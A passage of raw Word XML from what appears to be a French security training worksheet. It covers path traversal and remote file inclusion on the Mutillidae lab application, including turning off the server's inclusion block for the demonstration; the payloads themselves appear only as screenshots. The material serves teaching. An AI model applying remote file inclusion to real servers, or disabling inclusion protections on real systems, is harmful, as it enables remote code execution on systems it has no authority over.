                <wp:docPr id="13" name="Forme1_5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1775520" cy="391320"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="36357">
                          <a:solidFill>
                            <a:srgbClr val="3465A4"/>
                          </a:solidFill>
                          <a:round/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:lnRef>
                        <a:fillRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="minor"/>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6CE755DD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
                            <w:pPr>
                              <w:pStyle w:val="Contenudecadre"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr lIns="17640" tIns="17640" rIns="17640" bIns="17640" anchor="ctr">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="24B55AB8" id="Forme1_5" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:291.1pt;margin-top:5.8pt;width:139.85pt;height:30.85pt;z-index:21;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" o:allowincell="f" filled="f" strokecolor="#3465a4" strokeweight="1.0099mm">
                <v:stroke joinstyle="round"/>
                <v:textbox inset=".49mm,.49mm,.49mm,.49mm">
                  <w:txbxContent>
                    <w:p w14:paraId="6CE755DD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
                      <w:pPr>
                        <w:pStyle w:val="Contenudecadre"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C12E66" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="20" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="52D9A696" wp14:editId="02D89752">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5172075" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15" name="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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172075" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DDFDD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans un chemin, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.. </w:t>
      </w:r>
      <w:r>
        <w:t>renvoie vers le répertoire précédent dans l’arborescence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21EED7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D46181" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AD82EE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C84C20C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C151B2D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dossier 2 : Inclusion de fichiers distants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C07EDE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le fichier qui est affiché ou exécuté est situé sur le serveur web du pirate. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFC551" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D196E3" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Test de vulnérabilité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796350A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587DB1C6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On peut essayer d’afficher la page web de google en indiquant le lien vers cette page dans l’URL. Mutillidae décrit cette procédure dans son application. Pour cela, cliquer sur le lien </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hints and videos</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919DD8E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20558E9E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="22" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4A31DB90" wp14:editId="75C0F4AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4571365" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="16" name="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4571365" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D0ACF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA45EA5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCFC9AA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217863EA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Puis cliquer sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote File Inclusion</w:t>
      </w:r>
      <w:r>
        <w:t>. Vous pouvez alors tester un accès à la page de google si la maquette de travail dispose d’un accès à internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DC3BA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196A877F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="23" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0677D876" wp14:editId="3EB7D626">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="309245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17" name="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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="309245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCCD35" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Dans l’exemple ci-dessous, le serveur web qui héberge Mutillidae héberge aussi l’application GLPI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB93B53" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0025CD87" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="24" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2D9F3AE2" wp14:editId="50A2CA17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>414020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4819650" cy="2469515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18" name="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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4819650" cy="2469515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A5696" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE88837" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BE9866" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E9428A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27AA9EE5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579E8D48" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789EF80B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059EA5A0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3244A6B2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBBBDA7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536771FB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428C7A82" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22449C47" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2C1B79" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6026B5F7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481FA9BC" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BF6572" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A37938" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploitation de vulnérabilité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E12AA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CEF2E0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Un attaquant peut faire référence à l’adresse IP de son serveur pour faire exécuter un code malveillant. Sur Mutillidae, on peut avoir plus de renseignements sur l’exploitation de cette vulnérabilité en suivant le chemin suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B486386" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031EF7F5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRPr="0011432D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011432D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP 2017 =&gt; A5- Broken Access Control =&gt; Insecure Direct Object References =&gt; Remote File Inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B112C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRPr="0011432D" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676EB467" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Il est possible que le serveur web bloque, par défaut, les fichiers d’inclusion. Il faut donc, pour les besoins de la démonstration, supprimer ce blocage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BC815" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6807A059" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="102FB3F8" wp14:editId="1117DBE2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5714365" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19"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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5714365" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F648E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000099"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E2504F">
      <w:headerReference w:type="even" r:id="rId31"/>
      <w:headerReference w:type="default" r:id="rId32"/>
      <w:footerReference w:type="even" r:id="rId33"/>
      <w:footerReference w:type="default" r:id="rId34"/>
      <w:headerReference w:type="first" r:id="rId35"/>
      <w:footerReference w:type="first" r:id="rId36"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1418" w:bottom="1134" w:left="1418" w:header="0" w:footer="992"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4EC97" w14:textId="77777777" w:rsidR="004460BF" w:rsidRDefault="004460BF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19A60170" w14:textId="77777777" w:rsidR="004460BF" w:rsidRDefault="00446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Droid Sans Fallback">
    <w:altName w:val="Segoe UI"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="FreeSans">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Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Mangal">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00008003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DejaVu Sans Mono">
    <w:panose1 w:val="020B0609030804020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E70026FF" w:usb1="D200F9FB" w:usb2="02000028" w:usb3="00000000" w:csb0="000001DF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="SFMono-Regular">
    <w:altName w:val="Cambria"/>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5F7C9" w14:textId="77777777" w:rsidR="008D3057" w:rsidRDefault="008D305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ED863" w14:textId="1A8B83AD" w:rsidR="00E2504F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Pieddepage1"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="10" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="78ED042E" wp14:editId="37C6406A">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>1840865</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>47625</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="401955" cy="141605"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="20" name="Image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23"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="401955" cy="141605"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r>
      <w:t>http://www.reseaucerta.org</w:t>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve"> –  </w:t>
    </w:r>
    <w:r w:rsidR="008D3057">
      <w:t>Novembre</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> 202</w:t>
    </w:r>
    <w:r w:rsidR="008D3057">
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">  – v1.0</w:t>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
